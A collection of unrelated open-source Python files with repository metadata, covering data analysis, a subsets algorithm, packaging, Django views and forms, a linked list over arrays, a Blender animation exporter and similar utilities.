h_pc = Hint("h_pc4", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1, loc2])
res.append(h_pc)
return frozenset(res)
|
[
"en.magnago@gmail.com"
] |
en.magnago@gmail.com
|
0c430c6aecd9750cc42ba607375c8993c00e350c
|
0b420532815a3841b74335e1e6ab9f3d533225c3
|
/day_night.py
|
a9501b87541c63bc5ae6e47f5b599ce2137cbdd2
|
[] |
no_license
|
akuhnregnier/npower
|
3d7ec12e2e21a6e23db96714391986d372e0e6e0
|
bf3d842cde9b2e311cd415a8da7786ed36909645
|
refs/heads/master
| 2021-06-11T21:23:55.221317
| 2016-11-17T16:32:06
| 2016-11-17T16:32:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,808
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 03 17:08:37 2016
@author: ahk114
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#import seaborn as sns
import cPickle as pickle
import os
from numpy.fft import fft
from numpy.fft import fftfreq
import scipy.optimize as opt
import copy
plt.close('all')
pd.options.display.expand_frame_repr = False
pd.options.display.max_columns = 15
source = 'round_1.xlsx'
picklefile = 'round1.pickle'
if not os.path.isfile(picklefile):
df = pd.read_excel(source)
with open(picklefile,'wb') as f:
pickle.dump(df,f,protocol=2)
else:
with open(picklefile,'rb') as f:
df = pickle.load(f)
print "Rows, columns:", df.shape
temps = df['Temperature']
days = []
nights = []
for i,temp in enumerate(temps):
print "i",i
if i%48<12 or i%48>=36:
nights.append(temp)
else:
days.append(temp)
day_avg = []
night_avg = []
for i in range(0,len(days),24):
print "i2"
day_avg.append(np.mean(days[i:i+24]))
for i in range(0,len(nights),24):
print "i3",i
night_avg.append(np.mean(nights[i:i+24]))
dnight = []
dday = []
for i,demand in enumerate(df['Demand'].loc[df['Demand'] != '?? FC1 ??']):
print "i",i
if i%48<12 or i%48>=36:
dnight.append(demand)
else:
dday.append(demand)
demand_day_avg = []
demand_night_avg = []
for i in range(0,len(dday),24):
print "i2"
demand_day_avg.append(np.mean(dday[i:i+24]))
for i in range(0,len(dnight),24):
print "i3",i
demand_night_avg.append(np.mean(dnight[i:i+24]))
plt.figure()
plt.scatter(day_avg[:len(demand_day_avg)],demand_day_avg,c='g',label='day')
plt.scatter(night_avg[:len(demand_night_avg)],demand_night_avg,c='b',label='night')
plt.legend()
plt.xlabel('temperature')
plt.ylabel('demand')
|
[
"ahf.kuhnregnier@gmail.com"
] |
ahf.kuhnregnier@gmail.com
|
35bad535a079fa4d1c260581d0e8fc3ca1dd433a
|
59b72b8f662cd605b3ce31f54779c17e5ca066d0
|
/interview_q/leet_code/子集.py
|
d6aa3df0e62c43481165dd5041958cface2a3827
|
[] |
no_license
|
dongyang2/hello-world
|
c1f5853ccafd6b8f23836192547ab36f898e0891
|
1f859b53e2b21ed5a648da09b84950f03ec1b370
|
refs/heads/master
| 2022-12-11T22:07:22.853912
| 2022-11-24T03:52:35
| 2022-11-24T03:52:35
| 119,025,960
| 0
| 0
| null | 2018-01-26T10:09:58
| 2018-01-26T08:28:10
| null |
UTF-8
|
Python
| false
| false
| 2,388
|
py
|
# https://leetcode-cn.com/problems/subsets/
# coding: utf-8
# Python 3
# 给定一组不含重复元素的整数数组,返回该数组所有可能的子集,包括空集。
#
# 思路:直接使用“组合.py”文件的函数。
# 优化方法,观察输入n=10时的结果,发现后面的结果等于输入数组与前面的结果的差集。如,长度为9的子集,一定等于长度为10的子集减长度为1的子集的结果。
# 边界条件:
def erg_new_new(li, k, tmp, com):
n = len(tmp)
if n == k:
com.append(tmp)
else:
for i in range(len(li)):
if n > 0 and li[i] < tmp[-1]:
continue
elif n <= k-1:
# erg_new_new(li[i+1:], k, append_val(tmp, li[i]), com)
erg_new_new(li[i + 1:], k, tmp+[li[i]], com)
def combination(li, k):
n = len(li)
if k > n or k == 0:
return []
if k == 1:
return [[x] for x in li]
if k == n:
return [li]
com = []
erg_new_new(li, k, [], com)
return com
def sub_set(li):
ss = [[[]]]
sorted_li = sorted(li)
n = len(li)
half = int(n/2)
for i in range(1, half+1):
ss.append(combination(sorted_li, i))
if n % 2 == 0:
start_reverse = n-half+1
else:
start_reverse = n-half
for i in range(start_reverse, n+1):
tmp = []
for j in ss[n-i]:
tmp.append(difference(li, j))
ss.append(tmp)
ans = []
for i in ss:
ans += i
return ans
def difference(li, sub_li):
return [x for x in li if x not in sub_li]
def main():
tmp = []
tmp += []
print(tmp)
tmp = [[]]
tmp += [] # 原来Python默认把数组加空数组处理成了不连接(即不会多加一个空数组)
print(tmp)
tmp = [[]]
tmp += [[]] # 想加空数组要这么操作。
print(tmp)
tmp = [[]]
tmp += [[1], [2]]
print(tmp)
li1 = [1, 3, 5, 6]
li2 = [4, 6]
print(difference(li1, li2))
li1 = [1, 3, 5, 6]
li2 = []
print(difference(li1, li2))
n = 20
li = [x+1 for x in range(n)]
# print(combination(li, 5))
print(sub_set(li))
if __name__ == '__main__':
import time
print('-' * 15, 'Start', time.ctime(), '-' * 15, '\n')
main()
print('%s%s %s %s %s' % ('\n', '-' * 16, 'End', time.ctime(), '-' * 16))
|
[
"dongyangzhao@outlook.com"
] |
dongyangzhao@outlook.com
|
e25d5c6d44603dfc1ac7be40c0f5e63bce951fac
|
332ac6deaed8b8917cf874f04fc77246378bdb44
|
/setup.py
|
4db61d01cd37dbb3dd83d18bdb2eb0d4634cfe76
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
hestela/fauxmo
|
5a435399eca61c525502dc90333ee73cff0d3d15
|
f2246b952a0246bf0dcd74e770c9daea0dcaa763
|
refs/heads/master
| 2020-03-11T15:45:48.414168
| 2018-04-19T00:56:27
| 2018-04-19T01:08:35
| 130,095,227
| 0
| 0
| null | 2018-04-18T16:58:43
| 2018-04-18T16:58:43
| null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
import re
from setuptools import setup, find_packages
try:
import pypandoc
readme = pypandoc.convert('README.md', 'rst')
history = pypandoc.convert('CHANGELOG.md', 'rst')
except ImportError:
with open('README.md') as readme_file, \
open('CHANGELOG.md') as history_file:
readme = readme_file.read()
history = history_file.read()
with open('requirements-dev.txt') as dev_requirements_file, \
open('requirements-test.txt') as tests_requirements_file:
test_requirements = tests_requirements_file.read().splitlines()
dev_requirements = dev_requirements_file.read().splitlines()
dev_requirements.extend(test_requirements)
version_regex = re.compile(r'__version__ = [\'\"]v((\d+\.?)+)[\'\"]')
with open('src/fauxmo/__init__.py') as f:
vlines = f.readlines()
__version__ = next(re.match(version_regex, line).group(1) for line in vlines
if re.match(version_regex, line))
setup(
name="fauxmo",
version=__version__,
description="Emulated Belkin WeMo devices that work with the Amazon Echo",
long_description=readme + "\n\n" + history,
author="Nathan Henrie",
author_email="nate@n8henrie.com",
url="https://github.com/n8henrie/fauxmo",
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
license="MIT",
zip_safe=False,
keywords=["fauxmo", "alexa", "amazon echo"],
classifiers=[
"Natural Language :: English",
"Programming Language :: Python :: 3.6"
],
extras_require={
"dev": dev_requirements
},
test_suite="tests",
tests_require=test_requirements,
entry_points={'console_scripts': ['fauxmo=fauxmo.cli:cli']},
python_requires=">=3.6",
)
|
[
"nate@n8henrie.com"
] |
nate@n8henrie.com
|
8f2804428b63e25c8e704fb9def3a459ee42e87d
|
3b1053429de896731fe659b8ea09efe5f8bdc4cb
|
/src/db/DBStpHardware.py
|
902519e353ffa62e3425ec8e2b8cb150f10325d0
|
[] |
no_license
|
rajgu/machine-master
|
57bb6f05fce5dfa512ecd10bc5e7bb31bbd76b8a
|
f1a6081c9bfde1937341a1a55478c08d48005f05
|
refs/heads/master
| 2020-03-26T22:09:14.058722
| 2018-08-20T15:42:00
| 2018-08-20T15:42:00
| 145,435,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from src.db.Crud import Crud
class DBStpHardware(Crud):
_table_name = 'stp_hardware'
_table_struct = {
'stp_id' : {'type' : 'integer', 'validate' : True},
'type' : {'type' : 'text', 'validate' : True},
'name' : {'type' : 'text', 'validate' : True},
'serial_number': {'type' : 'text', 'validate' : True},
'location' : {'type' : 'text', 'validate' : True}
}
_horizontal_key = False
def __init__(self, db):
return Crud.__init__(self, db)
def create(self, data):
return Crud.create(self, data, self._table_name, self._table_struct, self._horizontal_key)
def read(self, data, oldata=False):
return Crud.read(self, data, self._table_name, self._table_struct, self._horizontal_key, oldata)
def update(self, data, where):
return Crud.update(self, data, where, self._table_name, self._table_struct, self._horizontal_key)
def delete(self, data):
return Crud.delete(self, data, self._table_name, self._table_struct, self._horizontal_key)
|
[
"="
] |
=
|
aba2a884d4f2b0a73725dccefc5950fbfc7e745e
|
74afe97073a0693042d31567ba1a5741bcdebf72
|
/tests/utils.py
|
82762100c4b3ab85ace2b7d2ff312d3fe836d466
|
[
"Apache-2.0"
] |
permissive
|
bruvio/tinyber
|
82aa34a5cdf842caa0f863540b249e37ae09fc78
|
d20d33341f9e74ba9b699553a8cf6448c167dec9
|
refs/heads/master
| 2021-05-29T23:07:58.841678
| 2015-07-23T23:24:52
| 2015-07-23T23:24:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
from asn1ate import parser
from asn1ate.sema import *
from tinyber.walker import Walker
from tinyber.py_nodes import PythonBackend as Backend
from tinyber import py_nodes as nodes
def generate(infilename, outfilename):
class FakeArgs(object):
no_standalone = False
import os
with open(infilename) as f:
asn1def = f.read()
parse_tree = parser.parse_asn1(asn1def)
modules = build_semantic_model(parse_tree)
assert (len(modules) == 1)
module_name = outfilename
path = "tests"
args = FakeArgs()
# pull in the python-specific node implementations
walker = Walker(modules[0], nodes)
walker.walk()
backend = Backend(args, walker, module_name, path)
backend.generate_code()
def test_reload():
import sys
sys.path[:0] = '.'
# reload tests since we just created a new module
import tests
reload(tests)
|
[
"mark@peek.org"
] |
mark@peek.org
|
7aa513a018f1f1887b44be7689dd657b6c9f8ed5
|
fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa
|
/src/python/dicomifier/__main__.py
|
b0fac30dd2023b3cfec7b87015b30eef36314d09
|
[
"LicenseRef-scancode-cecill-b-en"
] |
permissive
|
lamyj/dicomifier
|
bdd3ad5756563365fe59a31166cbcaa14f98603f
|
8601760917f7ef47d87fbd61d2c647c3d9cbeb3e
|
refs/heads/master
| 2023-04-28T15:45:52.571809
| 2023-04-20T15:50:03
| 2023-04-20T15:50:03
| 32,533,252
| 33
| 11
|
NOASSERTION
| 2022-09-12T16:53:20
| 2015-03-19T16:28:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
import argparse
import logging
import sys
from . import commands
def main():
parser = argparse.ArgumentParser(description="Dicomifier")
parser.add_argument(
"--verbosity", "-v", dest="main_verbosity",
choices=["warning", "info", "debug"], default="warning")
subparsers = parser.add_subparsers(help="Available commands")
command_parsers = {}
for name in ["list", "search", "to_dicom", "to_nifti", "diffusion_scheme"]:
command = getattr(commands, name)
subparser = command.setup(subparsers)
subparser.add_argument(
"--verbosity", "-v", dest="child_verbosity",
choices=["warning", "info", "debug"], default="warning")
subparser.set_defaults(action=command.action)
command_parsers[command.action] = subparser
arguments = vars(parser.parse_args())
if "action" not in arguments:
parser.print_help()
return 1
main_verbosity = arguments.pop("main_verbosity").upper()
child_verbosity = arguments.pop("child_verbosity").upper()
verbosity = min(
[getattr(logging, x) for x in [main_verbosity, child_verbosity]])
logging.basicConfig(
level=verbosity,
format="%(levelname)s - %(name)s: %(message)s")
action = arguments.pop("action")
try:
action(**arguments)
except Exception as e:
if verbosity == logging.DEBUG:
raise
else:
command_parsers[action].error(e)
if __name__ == "__main__":
sys.exit(main())
|
[
"lamy@unistra.fr"
] |
lamy@unistra.fr
|
1b103e18ecb604e87e2f579cf645558421707b91
|
8690ca0028c54b62d68badf1753fc6151ae03525
|
/Part3 Levels of Aggregation/fse_data/AllROIs/tpot_mnist_pipeline_triangulateAggregationLevelParticipantSplitaggr_2_groups4.py
|
7d1fc2a6145b7665e8206ac0c752c83a15062340
|
[] |
no_license
|
brains-on-code/conducting-and-analyzing-human-studies
|
fd74ee77fdc56cc61bdc1e0cf9bf423780f5dddc
|
548e7443f4d2bdb2db1f2858289b7d3518593c59
|
refs/heads/master
| 2021-06-26T21:30:56.386121
| 2020-12-22T13:49:16
| 2020-12-22T13:49:16
| 195,975,817
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 830
|
py
|
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
# NOTE: Make sure that the class is labeled 'target' in the data file
tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)
features = tpot_data.drop('target', axis=1).values
training_features, testing_features, training_target, testing_target = \
train_test_split(features, tpot_data['target'].values, random_state=42)
# Score on the training set was:1.0
exported_pipeline = RandomForestClassifier(bootstrap=False, criterion="gini", max_features=0.6500000000000001, min_samples_leaf=8, min_samples_split=6, n_estimators=100)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
|
[
"fmriml@fmriml.com"
] |
fmriml@fmriml.com
|
5594d738155165df35681f20b39b82b9a8c92c1f
|
c9ab605cdd2dbf92c9de05768ade0ecf1718be02
|
/03_Django/04_django_crud_review/jobs/views.py
|
92e5f3400502a07e8cddaa907118983276b91bed
|
[] |
no_license
|
PyeongGang-Kim/TIL
|
42d69308cf99d2e07644b51d7636e1b64551a697
|
8711501d131ee7d78fdaac544dda2008adf820a1
|
refs/heads/master
| 2023-01-12T21:10:38.027946
| 2021-10-23T07:19:48
| 2021-10-23T07:19:48
| 195,937,990
| 10
| 1
| null | 2023-01-07T11:25:30
| 2019-07-09T05:22:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,489
|
py
|
from django.shortcuts import render
from .models import Job
from faker import Faker
from decouple import config
import requests
from IPython import embed
from pprint import pprint
# Create your views here.
def index(request):
return render(request, 'jobs/index.html')
def past_life(request):
name = request.POST.get('name')
person = Job.objects.filter(name=name).first()
if person:
past_job = person.past_job
else:
fake = Faker()
past_job = fake.job()
person = Job(name=name, past_job=past_job)
person.save()
# GIPHY
#1. API키 가져오기
GIPHY_API_KEY = config('GIPHY_API_KEY')
url = 'http://api.giphy.com/v1/gifs/search?api_key={}&q={}&limit=1&'.format(GIPHY_API_KEY, past_job)
data = requests.get(url).json()
image = data.get('data')[0].get('images').get('original').get('url')
#네이버 이미지
#1 요청 헤더 정보 준비
headers = {
'X-Naver-Client-Id': config('NAVER_ID'),
'X-Naver-Client-Secret': config('NAVER_SECRET')
}
#2 요청 url 준비
url2 = 'https://openapi.naver.com/v1/search/image?query='+past_job+'&filter=medium&display=1'
#3 요청 보내기
naver_image = requests.get(url2, headers=headers).json().get('items')[0].get('link')
context = {'person': person, 'image': image, 'naver_image': naver_image}
return render(request, 'jobs/past_life.html', context)
# try:
# name = request.POST.get('name')
# job = Job.objects.get(name=name)
# #요청 url 세팅
# try:
# image = requets.get(url).json().
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# embed()
# return render(request, 'jobs/past_life.html', context)
# except:
# fake = Faker()
# job = Job(name=name, past_job=fake.job())
# job.save()
# url = 'http://api.giphy.com/v1/gifs/search?api_key=' + GIPHY_API_KEY + '&q='+job.past_job+'&limit=1'
# try:
# image = requets.get(url).json().get('data')[0].get('images').get('original').get('url')
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# return render(request, 'jobs/past_life.html', context)
|
[
"pyeonggangkim@gmail.com"
] |
pyeonggangkim@gmail.com
|
8d8bd2733afc957d19afad643b783047d417c231
|
b40fbe6d0012a299b0e771d2e5f0cfca3fe5be2b
|
/gen_bulk.py
|
f4fad52f721f76c134105cc0a87572a95af0cbb3
|
[] |
no_license
|
olimpiadi-informatica/randomtex
|
e8555776daa3761b6014cdf006b9c903db7f0fb2
|
1da019715c44db6a51135cb02dbf5a4e52586a95
|
refs/heads/main
| 2023-04-14T15:15:25.641932
| 2021-04-26T13:57:47
| 2021-04-26T14:13:03
| 358,237,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,612
|
py
|
#!/usr/bin/env python3
import argparse
import csv
import datetime
import json
import logging
import multiprocessing.dummy as mp
import os
import random
import shutil
import tempfile
import progressbar
import compilation
import utils
progressbar.streams.wrap_stderr()
logger = logging.getLogger("gen_bulk")
def process_user(user, args, work_dir):
contest_dir = args.contest_dir
rnd = random.Random(int(user["seed"]))
tex, sol, order = utils.render_contest(contest_dir, rnd, context=user)
user["solutions"] = ":".join(sol)
user["questions_order"] = ":".join(map(str, order))
filename = user["filename"]
password = user["pdf_password"]
target = os.path.join(args.output_pdf, filename)
if os.path.exists(target):
logger.warning("File %s already present, skipping...", target)
return user
with tempfile.NamedTemporaryFile(prefix=filename) as f:
compilation.compile(tex, f.name, work_dir)
if args.no_enc:
shutil.move(f.name, target)
else:
logger.info("Encrypting PDF %s -> %s", f.name, target)
utils.encrypt_pdf(f.name, target, password)
return user
def generate(args, work_dir, users):
contest_dir = args.contest_dir
compilation.setup(contest_dir, work_dir)
os.makedirs(args.output_pdf, exist_ok=True)
def process(user):
return process_user(user, args, work_dir)
result = []
widgets = [
"[",
progressbar.SimpleProgress(),
" / ",
progressbar.Percentage(),
"] ",
progressbar.Bar(),
" ",
progressbar.Timer(),
" | ",
progressbar.AdaptiveETA(samples=datetime.timedelta(seconds=10)),
]
with mp.Pool(args.num_cores) as pool:
for res in progressbar.progressbar(
pool.imap_unordered(process, users),
max_value=len(users),
redirect_stdout=True,
widgets=widgets,
):
if res:
result.append(res)
headers = list(result[0].keys())
with open(args.output_csv, "w") as f:
writer = csv.DictWriter(f, headers)
writer.writeheader()
writer.writerows(result)
def main(args):
with open(args.users_csv) as f:
reader = csv.DictReader(f)
users = list(reader)
if args.work_dir:
generate(args, args.work_dir, users)
else:
with tempfile.TemporaryDirectory() as work_dir:
generate(args, work_dir, users)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--work-dir",
"-w",
help="Working directory for the compilation",
)
parser.add_argument(
"--num-cores",
"-j",
help="Number of parallel compilations",
type=int,
)
parser.add_argument("--verbose", "-v", help="Verbose output", action="store_true")
parser.add_argument("--no-enc", help="Do not encrypt the pdfs", action="store_true")
parser.add_argument("contest_dir", help="Directory with the contest")
parser.add_argument("users_csv", help="Path to the csv file with the students data")
parser.add_argument(
"output_pdf",
help="Directory of where to save the compiled pdf files",
)
parser.add_argument(
"output_csv",
help="Path where to save the CSV with the solutions",
)
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format="%(asctime)s [%(levelname)s] [%(name)s] %(message)s",
)
main(args)
|
[
"williamdiluigi@gmail.com"
] |
williamdiluigi@gmail.com
|
f8938e7c7df3a92df60e420a4429cb058096a7e6
|
4be5c172c84e04c35677f5a327ab0ba592849676
|
/python/data_structures/array/sll/sll.py
|
dbdb9af0a8277d797c590e960437f9b0ac88de97
|
[] |
no_license
|
niranjan-nagaraju/Development
|
3a16b547b030182867b7a44ac96a878c14058016
|
d193ae12863971ac48a5ec9c0b35bfdf53b473b5
|
refs/heads/master
| 2023-04-06T20:42:57.882882
| 2023-03-31T18:38:40
| 2023-03-31T18:38:40
| 889,620
| 9
| 2
| null | 2019-05-27T17:00:29
| 2010-09-05T15:58:46
|
Python
|
UTF-8
|
Python
| false
| false
| 5,315
|
py
|
'''
A SLL implemented using regular arrays
SLL corresponding to
78 -> 10 -> 41 -> 36 -> 21
is represented below
| Index | Node | Node |
| | data | next |
|-------+------+------|
| 0 | 10 | 7 |
| 1 | | |
| 2 | 36 | 9 |
| 3 | | |
| 4 | | |
head -> | 5 | 78 | 0 |
| 6 | | |
| 7 | 41 | 2 |
| 8 | | |
| 9 | 21 | -1 |
| 10 | | |
The underlying array for the SLL contains two disjoint lists
1. Available-list: contains a list of nodes that are available
2. Allocated-list: contains a list of nodes that are currently in use
'''
class SLL(object):
class Node(object):
def __init__(self, data=None, next=-1):
self.data = data
# next index == -1 implies there's no next link
self.next = next
def __repr__(self):
return str(self)
def __str__(self):
return str((self.data, self.next))
def __init__(self, capacity):
self.capacity = capacity
self._allocated = 0
# Initially all nodes are available
# chain them one-after-another sequentially
# into an available list
self._array = [SLL.Node(None, i+1) for i in xrange(self.capacity)]
self._array[-1].next = -1 # Tail of the available list
self.available_list = 0 # Index 0 is head of the available list
self.allocated_list = -1 # Allocated list is empty
self.allocated_tail = -1 # Allocated list is empty => tail: None
def __len__(self):
return self._allocated
def __str__(self):
lStr = '[{}]: '.format(len(self))
head = self.allocated_list
while head != -1:
lStr += str(self._array[head].data) + " -> "
head = self._array[head].next
return lStr
# Return a free node, initialized to 'data' from the available list.
# if there are any
# Raises MemoryError if the entire capacity of the array is currently allocated
def getNode(self, data):
if self.available_list == -1:
raise MemoryError("Linked list is at capacity")
node = self.available_list
self.available_list = self._array[self.available_list].next
self._array[node].next = -1
self._array[node].data = data
self._allocated += 1
return node
# Add a node back to the available list
def freeNode(self, node):
self._allocated -= 1
# blank data corresponding to the 'freed' node
# so all the nodes in the available list
# are blank signifying they are all re-usable containers
self._array[node].data = None
self._array[node].next = self.available_list
self.available_list = node
# Insert a node to the end of the SLL
def push_back(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
self._array[self.allocated_tail].next = node
self.allocated_tail = node
# Insert a node at the front to the SLL
def push_front(self, data):
# get a freenode from the available list
node = self.getNode(data)
self._array[node].next = self.allocated_list
self.allocated_list = node
if self.allocated_tail == -1:
# First node being added to the SLL
# update tail
self.allocated_tail = node
# Remove a node from the front of the SLL
def pop_front(self):
if self.allocated_list == -1:
# Nothing to pop, list is empty
return None
node = self.allocated_list
data = self._array[node].data
self.allocated_list = self._array[self.allocated_list].next
if self.allocated_list == -1:
self.allocated_tail = -1
self.freeNode(node)
return data
# Remove a node from the end of the SLL
def pop_back(self):
if self.allocated_list == -1:
# Nothing to pop, list is empty
return None
node = self.allocated_list
while self._array[node].next != self.allocated_tail:
node = self._array[node].next
data = self._array[self.allocated_tail].data
self.freeNode(self.allocated_tail)
# There's only one node in the SLL
if node == self.allocated_list:
self.allocated_tail = self.allocated_list = -1
else:
self._array[node].next = -1
self.allocated_tail = node
return data
# Place 'data' in the SLL in its rightful place
# Uses cmp(data, x) {x: for each item in the SLL}
# Inserting only using 'place()' into the SLL will leave the SLL sorted
def place(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
if data < self._array[self.allocated_list].data:
# current data is < everything in the SLL
self._array[node].next = self.allocated_list
self.allocated_list = node
return
if data >= self._array[self.allocated_tail].data:
# current data is > everything in the SLL
self._array[self.allocated_tail].next = node
self.allocated_tail = node
return
tmp = self.allocated_list
prev = None
while tmp != -1 and self._array[tmp].data <= data:
prev = tmp
tmp = self._array[tmp].next
# At this point, We have found a rightful place to insert current node
# prev is node after which 'data' needs to be inserted
self._array[prev].next = node
self._array[node].next = tmp
|
[
"vinithepooh@gmail.com"
] |
vinithepooh@gmail.com
|
2553bc5ec831453cc73c3732fdbffe014c7cf7ce
|
e82b761f53d6a3ae023ee65a219eea38e66946a0
|
/All_In_One/addons/mc-animation-blender/operator_anim_export.py
|
503e83160184e749fd854f38b8b1ff3864169f8f
|
[] |
no_license
|
2434325680/Learnbgame
|
f3a050c28df588cbb3b14e1067a58221252e2e40
|
7b796d30dfd22b7706a93e4419ed913d18d29a44
|
refs/heads/master
| 2023-08-22T23:59:55.711050
| 2021-10-17T07:26:07
| 2021-10-17T07:26:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,913
|
py
|
import bpy
import math
import json
# ExportHelper is a helper class, defines filename and
# invoke() function which calls the file selector.
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
class operator_anim_export(Operator, ExportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "mcanim.export" # important since its how bpy.ops.import_test.some_data is constructed
bl_label = "Export Minecraft Animation (.mcanim)"
# ExportHelper mixin class uses this
filename_ext = ".mcanim"
filter_glob = StringProperty(
default="*.mcanim",
options={'HIDDEN'},
maxlen=255, # Max internal buffer length, longer would be clamped.
)
# List of operator properties, the attributes will be assigned
# to the class instance from the operator settings before calling.
looping = BoolProperty(
name="Looping",
description="Should this animation loop?",
default=True,
)
resetWhenDone = BoolProperty(
name="Reset when done",
description="Should this reset to starting position when done?",
default=False,
)
id = StringProperty(
name="ID",
description="Unique numerical ID that Minecraft will refer to this animation by",
default='0',
)
def execute(self, context):
return export(context, self.id, self.looping, self.resetWhenDone, self.filepath)
# specific export function for menu
def export(context, id, looping, resetWhenDone, path):
return write_mcanim(context, context.scene.objects.active, int(id), looping, resetWhenDone, path)
# write animation to disk
def write_mcanim(context, object, id, looping, resetWhenDone, path):
frames = []
# output all frames into frames array
for i in range(context.scene.frame_start, context.scene.frame_end):
frames.append(write_frame(context,object,i))
# add additional metadata to file
output = {
"version": "0.2",
"id": id,
"looping": looping,
"resetPos": resetWhenDone,
"frames": frames
}
# create json string
formatted = json.dumps(output, sort_keys=True, indent=4, separators=(',', ': '))
# output to file
file = open(path, "w")
file.write(formatted)
file.close
print("Outputted to: "+path)
return {'FINISHED'}
# returns a dictionary with a single frame of animation
def write_frame(context, object, frame):
# make sure we're on the right frame
context.scene.frame_set(frame)
# get all the bones in the armature
bones = object.pose.bones
# get values from said bones
body = convert_array(get_rotation(bones['body']), False)
left_arm = convert_array(get_rotation(bones['left_arm']), False)
right_arm = convert_array(get_rotation(bones['right_arm']), False)
left_leg = convert_array(get_rotation(bones['left_leg']), False)
right_leg = convert_array(get_rotation(bones['right_leg']), False)
head = convert_array(get_rotation(bones['head']), True)
location = [round(bones['root'].location[0], 2), round(bones['root'].location[1], 2), round(bones['root'].location[2], 2)]
rotation = round(math.degrees(get_rotation(bones['root'])[1]), 2)
# output found values to dictionary
output = {
"body": body,
"left_arm": left_arm,
"right_arm": right_arm,
"left_leg": left_leg,
"right_leg": right_leg,
"head": head,
"location": location,
"rotation": rotation
}
return output
# returns the rotation in euler, no matter what it was initially in
def get_rotation(input):
if input.rotation_mode == 'QUATERNION':
return input.rotation_quaternion.to_euler()
else:
return input.rotation_euler
# takes an array attained by armature.pose.bones[bone].rotation_euler, converts it to degrees, and does correct formulas.
def convert_array(array, isHead):
if isHead:
new_array = [array[0]*-1, array[1]*-1, array[2]]
else:
new_array = [array[2], array[1], array[0]*-1]
new_array[0] = round(math.degrees(new_array[0]), 2)
new_array[1] = round(math.degrees(new_array[1]), 2)
new_array[2] = round(math.degrees(new_array[2]), 2)
return new_array
# Only needed if you want to add into a dynamic menu
def menu_func_export(self, context):
self.layout.operator(operator_anim_export.bl_idname, text="Minecraft Animation (.mcanim)")
def register():
bpy.types.INFO_MT_file_export.append(menu_func_export)
def unregister():
bpy.types.INFO_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
register()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
936b3abfafeee8de92355161e81f2cf35625caf2
|
2d8d7fef8f914f1b2337ee5d6a2e7c61dab9ec4e
|
/基础知识/1.语法基础/13.dict字典-增删改查.py
|
8ea74ff8b009cb80334f8c2c6f4eb2ba593b1051
|
[] |
no_license
|
kuaikang/python3
|
bb5bb8d807c4a8818b18f0d4e598232cc73ab3af
|
60ca72662c7a6e718190ffa6139a129c1412a3fb
|
refs/heads/master
| 2021-04-28T10:32:25.416550
| 2018-07-06T01:59:47
| 2018-07-06T01:59:47
| 122,068,697
| 13
| 11
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 658
|
py
|
print("字典是key-value的数据类型".center(50, "-"))
print("字典是无序的,key不能重复")
info = {"stu1": "tom", "stu2": "jack", "stu3": "lucy"}
print(info)
# 添加
info["stu4"] = "bob"
# 修改
info["stu1"] = "zhang"
# 删除
# info.pop("stu2") # 标准删除方法
# del info["stu3"]
# 查找
print('-----',info.get("stu11")) # 不存在的时候返回
# print(info["stu0"]) # 不存在时会报错
print(info)
print()
import sys
for key in info.keys():
sys.stdout.write(key + " ")
print()
for val in info.values():
sys.stdout.write(val + " ")
print()
for key, val in info.items():
sys.stdout.write(key + "-->" + val + " ")
|
[
"359405466@qq.com"
] |
359405466@qq.com
|
9b1336a598319774d6c7b2b0860e876c933a8cbc
|
c1fe97208afe479b7ae1ee67d69866a6911564ca
|
/Login/profilecreate/forms.py
|
99f047fe4e0523e89dce7b7d71637698624e0c1c
|
[] |
no_license
|
jaindhairyahere/Python_Django
|
a0a46c57b6ca60d0942ae181fe28ea56bb1ee948
|
f170a2e38b78df698a02821a454a3baea0c358a6
|
refs/heads/master
| 2020-06-18T09:17:56.364928
| 2019-11-02T18:34:12
| 2019-11-02T18:34:12
| 196,249,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
from django import forms
from django.contrib.auth.admin import User
from .models import Alumni
from django.core import validators
def check_PhoneNumber(value):
if len(value) != 10:
raise forms.ValidationError("Not a phone Number")
class UserForm(forms.ModelForm):
password = forms.CharField(widget = forms.PasswordInput())
